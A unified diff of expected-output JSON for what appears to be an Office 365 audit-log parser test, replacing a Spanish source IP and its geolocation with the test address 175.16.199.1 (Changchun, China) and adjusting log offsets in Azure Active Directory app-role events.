@@ -730,20 +722,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -754,8 +744,8 @@ }, { "@timestamp": "2020-02-09T15:34:06.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Remove app role assignment from service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -770,7 +760,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 24655, + "log.offset": 24645, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -799,9 +789,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:34:06", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -893,20 +883,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -917,8 +905,8 @@ }, { "@timestamp": "2020-02-09T15:34:06.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -933,7 +921,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 29810, + "log.offset": 29798, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -962,9 +950,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:34:06", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1056,20 +1044,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -1080,8 +1066,8 @@ }, { "@timestamp": "2020-02-09T15:34:06.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Remove app role assignment from service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -1096,7 +1082,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 35008, + "log.offset": 34994, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -1125,9 +1111,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:34:06", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -1219,20 +1205,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -1243,8 +1227,8 @@ }, { "@timestamp": "2020-02-09T15:34:06.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -1259,7 +1243,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 40163, + "log.offset": 40147, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -1288,9 +1272,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:34:06", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1382,20 +1366,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -1406,8 +1388,8 @@ }, { "@timestamp": "2020-02-09T15:34:06.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Remove app role assignment from service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -1422,7 +1404,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 45361, + "log.offset": 45343, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -1451,9 +1433,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:34:06", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1545,20 +1527,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -1569,8 +1549,8 @@ }, { "@timestamp": "2020-02-09T15:34:47.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -1585,7 +1565,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 50516, + "log.offset": 50496, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -1614,9 +1594,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:34:47", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -1708,20 +1688,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -1732,8 +1710,8 @@ }, { "@timestamp": "2020-02-09T15:34:47.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -1748,7 +1726,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 55714, + "log.offset": 55692, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -1777,9 +1755,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:34:47", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -1871,20 +1849,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -1895,8 +1871,8 @@ }, { "@timestamp": "2020-02-09T15:34:47.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Remove app role assignment from service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -1911,7 +1887,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 60912, + "log.offset": 60888, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -1940,9 +1916,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:34:47", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -2034,20 +2010,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -2058,8 +2032,8 @@ }, { "@timestamp": "2020-02-09T15:34:47.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -2074,7 +2048,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 66067, + "log.offset": 66041, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -2103,9 +2077,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:34:47", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -2197,20 +2171,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -2221,8 +2193,8 @@
 },
 {
 "@timestamp": "2020-02-09T15:34:47.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Remove app role assignment from service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -2237,7 +2209,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 71265,
+ "log.offset": 71237,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2266,9 +2238,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T15:34:47",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2360,20 +2332,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -2384,8 +2354,8 @@
 },
 {
 "@timestamp": "2020-02-09T15:34:47.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Remove app role assignment from service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -2400,7 +2370,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 76420,
+ "log.offset": 76390,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2429,9 +2399,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T15:34:47",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2523,20 +2493,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -2547,8 +2515,8 @@
 },
 {
 "@timestamp": "2020-02-09T15:34:47.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -2563,7 +2531,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 81575,
+ "log.offset": 81543,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2592,9 +2560,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T15:34:47",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -2686,20 +2654,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -2710,8 +2676,8 @@
 },
 {
 "@timestamp": "2020-02-09T15:34:47.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Remove app role assignment from service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -2726,7 +2692,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 86773,
+ "log.offset": 86739,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -2755,9 +2721,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T15:34:47",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
